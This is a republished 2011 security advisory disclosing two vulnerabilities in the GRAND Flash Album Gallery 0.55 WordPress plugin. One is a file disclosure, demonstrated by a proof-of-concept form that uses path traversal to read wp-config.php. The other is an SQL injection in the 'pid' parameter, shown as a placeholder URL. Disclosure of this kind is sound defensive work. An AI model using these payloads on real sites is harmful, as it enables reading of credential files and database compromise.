Lucene search

K
packetstormHigh-Tech Bridge SAPACKETSTORM:99082
HistoryMar 08, 2011 - 12:00 a.m.

GRAND Flash Album Gallery 0.55 SQL Injection / File Disclosure

2011-03-0800:00:00
High-Tech Bridge SA
packetstormsecurity.com
15
`===============================  
Vulnerability ID: HTB22871  
Reference: http://www.htbridge.ch/advisory/file_content_disclosure_in_grand_flash_album_gallery_wordpress_plugin.html  
Product: GRAND Flash Album Gallery wordpress plugin  
Vendor: Sergey Pasyuk ( http://codeasily.com/ )   
Vulnerable Version: 0.55  
Vendor Notification: 22 February 2011   
Vulnerability Type: File Content Disclosure  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists due to failure in the "/wp-content/plugins/flash-album-gallery/admin/news.php" script to properly sanitize user-supplied input in "want2Read" variable.  
Successful exploitation of this vulnerability allows remote attacker to obtain content of arbitrary file accessible within the context of vulnerable application.  
  
The following PoC is available:  
  
  
<form action="http://[host]/wp-content/plugins/flash-album-gallery/admin/news.php" method="post" name="main" >  
<input type="hidden" name="want2Read" value="../../../../wp-config.php" />  
<input type="submit" value="submit" name="submit" />  
</form>  
  
  
===============================  
Vulnerability ID: HTB22870  
Reference: http://www.htbridge.ch/advisory/sql_injection_in_grand_flash_album_gallery_wordpress_plugin.html  
Product: GRAND Flash Album Gallery wordpress plugin  
Vendor: Sergey Pasyuk ( http://codeasily.com/ )   
Vulnerable Version: 0.55  
Vendor Notification: 22 February 2011   
Vulnerability Type: SQL Injection  
Risk level: High   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists due to failure in the "/wp-content/plugins/flash-album-gallery/lib/hitcounter.php" script to properly sanitize user-supplied input in "pid" variable.  
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.  
  
The following PoC is available:  
  
  
http://[host]/wp-content/plugins/flash-album-gallery/lib/hitcounter.php?pid=SQL_CODE_HERE  
  
  
`